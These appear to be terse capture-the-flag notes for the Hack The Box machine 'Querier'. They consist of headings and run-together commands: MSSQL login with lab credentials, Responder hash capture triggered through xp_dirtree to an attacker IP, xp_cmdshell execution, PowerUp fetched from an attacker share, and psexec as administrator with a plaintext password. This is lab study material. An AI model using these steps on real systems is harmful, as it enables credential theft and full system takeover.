HTB | Querier
Skill Learned
NMAP


Port 139 and 445



Foothold/shell







Capture Net-NTLMv2












Priv Esc





Last updated





























Last updated
binwalk -ecat vbaProject.bin | stringsmssqlclient.py reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-authselect @@VersionSELECT * FROM fn_my_permissions(NULL, 'SERVER');SELECT name FROM master.sys.databasessudo responder -I tun0xp_dirtree '\10.10.14.8\a';xp_cmdshell whoamienable_xp_cmdshell
xp_cmdshell whoamixcopy \10.10.14.8\share\PowerUp.ps1 .powershell -ep bypass
.\PowerUp.ps1psexec.py administrator:'MyUnclesAreMarioAndLuigi!!1!'@10.10.10.125